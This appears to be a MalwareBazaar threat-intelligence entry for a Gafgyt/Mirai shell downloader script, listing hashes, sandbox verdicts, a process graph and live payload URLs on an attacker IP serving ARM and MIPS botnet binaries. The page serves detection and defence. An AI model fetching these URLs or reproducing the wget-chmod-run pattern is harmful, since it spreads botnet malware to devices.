MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 5


Intelligence 5 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274
SHA3-384 hash: e9e30d543fb0e9c38c82716ad4cd7bf5cf5c3595da33069968fc67e9d6018b54a9d11b89c6496a31970eb3308e5eeed4
SHA1 hash: cb22bda37d8843364461e50d756dda4b36466d6a
MD5 hash: fe0904dca6ecb54a5acdcd1f7970a641
humanhash: mississippi-august-winner-chicken
File name:lilin.sh
Download: download sample
Signature Gafgyt
Create hunting rule
File size:650 bytes
First seen:2026-01-28 16:28:16 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 12:CLJoZDSLJhHWNCLsySLshHWNCLPBzvSLPBzMHWNCLPnIjDSLPnIMHWNCLPiDSLPQ:CCZeTWNCw5wRWNC9z69zGWNCzJzhWNC4
TLSH T1E4F0BFFF01A04CAD2144FA4AF9E34E79A81A69DD54C60F4C9A9F2C393C8D9187835F5D
Magika batch
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://109.104.155.24/mipse21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d Gafgyt32-bit elf gafgyt Mozi
http://109.104.155.24/mpsl10a7aff25c88eb3fb4ce17dbdd1d78e941b3c4696935f2843afae1a7403c73d3 Miraielf mirai ua-wget
http://109.104.155.24/arm4ac0de66ad392299c321c00db0b0f010ff5d63a18392364b8f07ea8da4f94c52f Miraielf mirai ua-wget
http://109.104.155.24/arm55a2f439cbeb1481de5ee95086d4119fbf28a8d8b89ae9a93ee9dd45472cf5f78 Miraielf mirai ua-wget
http://109.104.155.24/arm7fefec7b2d044fee96b0d7315c1a648a64c78fd6cbb1753c7d90e027676379e7e Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
32
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
base64 bash busybox evasive lolbin mirai
Link:
https://www.filescan.io/uploads/697a392c12c4ad8c0858e7a3/reports/72a0119e-7aef-4fdd-9579-f84620a22399/overview
Result
Gathering data
Verdict:
Unknown
File Type:
Link:
https://opentip.kaspersky.com/280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/ba652747-75e4-4455-882e-0dce14519e23
Behavior Graph:
Download SVG
%3 guuid=c613bfb7-1a00-0000-8c30-834e520b0000 pid=2898 /usr/bin/sudo guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899 /tmp/sample.bin guuid=c613bfb7-1a00-0000-8c30-834e520b0000 pid=2898->guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899 execve guuid=6bec7bba-1a00-0000-8c30-834e540b0000 pid=2900 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=6bec7bba-1a00-0000-8c30-834e540b0000 pid=2900 clone guuid=7340eefb-1a00-0000-8c30-834ec10b0000 pid=3009 /usr/bin/chmod guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=7340eefb-1a00-0000-8c30-834ec10b0000 pid=3009 execve guuid=cba646fc-1a00-0000-8c30-834ec30b0000 pid=3011 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=cba646fc-1a00-0000-8c30-834ec30b0000 pid=3011 clone guuid=e573f8fc-1a00-0000-8c30-834ec70b0000 pid=3015 /usr/bin/rm delete-file guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=e573f8fc-1a00-0000-8c30-834ec70b0000 pid=3015 execve guuid=748f54fd-1a00-0000-8c30-834ec80b0000 pid=3016 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=748f54fd-1a00-0000-8c30-834ec80b0000 pid=3016 clone guuid=8cf3c248-1b00-0000-8c30-834e6b0c0000 pid=3179 /usr/bin/chmod guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=8cf3c248-1b00-0000-8c30-834e6b0c0000 pid=3179 execve guuid=f3135649-1b00-0000-8c30-834e6c0c0000 pid=3180 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=f3135649-1b00-0000-8c30-834e6c0c0000 pid=3180 clone guuid=b9261d4a-1b00-0000-8c30-834e6e0c0000 pid=3182 /usr/bin/rm delete-file guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=b9261d4a-1b00-0000-8c30-834e6e0c0000 pid=3182 execve guuid=2135b84a-1b00-0000-8c30-834e710c0000 pid=3185 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=2135b84a-1b00-0000-8c30-834e710c0000 pid=3185 clone guuid=062ec6b0-1b00-0000-8c30-834edb0c0000 pid=3291 /usr/bin/chmod guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=062ec6b0-1b00-0000-8c30-834edb0c0000 pid=3291 execve guuid=b7e56eb1-1b00-0000-8c30-834edd0c0000 pid=3293 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=b7e56eb1-1b00-0000-8c30-834edd0c0000 pid=3293 clone guuid=808e28b2-1b00-0000-8c30-834ee10c0000 pid=3297 /usr/bin/rm delete-file guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=808e28b2-1b00-0000-8c30-834ee10c0000 pid=3297 execve guuid=792f78b2-1b00-0000-8c30-834ee30c0000 pid=3299 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=792f78b2-1b00-0000-8c30-834ee30c0000 pid=3299 clone guuid=15905ffd-1b00-0000-8c30-834e7e0d0000 pid=3454 /usr/bin/chmod guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=15905ffd-1b00-0000-8c30-834e7e0d0000 pid=3454 execve guuid=083abafd-1b00-0000-8c30-834e800d0000 pid=3456 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=083abafd-1b00-0000-8c30-834e800d0000 pid=3456 clone guuid=7bf56bfe-1b00-0000-8c30-834e840d0000 pid=3460 /usr/bin/rm delete-file guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=7bf56bfe-1b00-0000-8c30-834e840d0000 pid=3460 execve guuid=6c3fb4fe-1b00-0000-8c30-834e850d0000 pid=3461 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=6c3fb4fe-1b00-0000-8c30-834e850d0000 pid=3461 clone guuid=7d267d3c-1c00-0000-8c30-834e150e0000 pid=3605 /usr/bin/chmod guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=7d267d3c-1c00-0000-8c30-834e150e0000 pid=3605 execve guuid=c6f2bb3c-1c00-0000-8c30-834e170e0000 pid=3607 /usr/bin/dash guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=c6f2bb3c-1c00-0000-8c30-834e170e0000 pid=3607 clone guuid=a0d6433d-1c00-0000-8c30-834e1a0e0000 pid=3610 /usr/bin/rm delete-file guuid=3f0ae6b9-1a00-0000-8c30-834e530b0000 pid=2899->guuid=a0d6433d-1c00-0000-8c30-834e1a0e0000 pid=3610 execve guuid=4d6b9cba-1a00-0000-8c30-834e550b0000 pid=2901 /usr/bin/wget net send-data write-file guuid=6bec7bba-1a00-0000-8c30-834e540b0000 pid=2900->guuid=4d6b9cba-1a00-0000-8c30-834e550b0000 pid=2901 execve 385d8803-1747-5868-8d2c-7f0b0905a0a5 109.104.155.24:80 guuid=4d6b9cba-1a00-0000-8c30-834e550b0000 pid=2901->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=fb6664fd-1a00-0000-8c30-834ec90b0000 pid=3017 /usr/bin/wget net send-data write-file guuid=748f54fd-1a00-0000-8c30-834ec80b0000 pid=3016->guuid=fb6664fd-1a00-0000-8c30-834ec90b0000 pid=3017 execve guuid=fb6664fd-1a00-0000-8c30-834ec90b0000 pid=3017->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=b10fc54a-1b00-0000-8c30-834e720c0000 pid=3186 /usr/bin/wget net send-data write-file guuid=2135b84a-1b00-0000-8c30-834e710c0000 pid=3185->guuid=b10fc54a-1b00-0000-8c30-834e720c0000 pid=3186 execve guuid=b10fc54a-1b00-0000-8c30-834e720c0000 pid=3186->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=e3e382b2-1b00-0000-8c30-834ee40c0000 pid=3300 /usr/bin/wget net send-data write-file guuid=792f78b2-1b00-0000-8c30-834ee30c0000 pid=3299->guuid=e3e382b2-1b00-0000-8c30-834ee40c0000 pid=3300 execve guuid=e3e382b2-1b00-0000-8c30-834ee40c0000 pid=3300->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=e6a9c1fe-1b00-0000-8c30-834e860d0000 pid=3462 /usr/bin/wget net send-data write-file guuid=6c3fb4fe-1b00-0000-8c30-834e850d0000 pid=3461->guuid=e6a9c1fe-1b00-0000-8c30-834e860d0000 pid=3462 execve guuid=e6a9c1fe-1b00-0000-8c30-834e860d0000 pid=3462->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274
Gathering data
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=fafvu5wyyluhaylnwey6ru4ufy4n3wywxmq2hz3slyfarlwacj2a._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/260128-tyvqnsfy9b/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ach_202412_suspect_bash_script
Create hunting rule
Author:abuse.ch
Description:Detects suspicious Linux bash scripts

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh 280b5a76d8c2e870616db131e8d3942e38dddb16bb21a3e7725e0a08aec01274

(this sample)

Gafgyt

elf e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d

  
URLhaus
https://urlhaus.abuse.ch/url/3765128/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3765157/
  
URLhaus
https://urlhaus.abuse.ch/url/3765159/
  
Dropping
MD5 8526b44220e0c103f843854638746dcc
  
Dropping
SHA256 e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d

Comments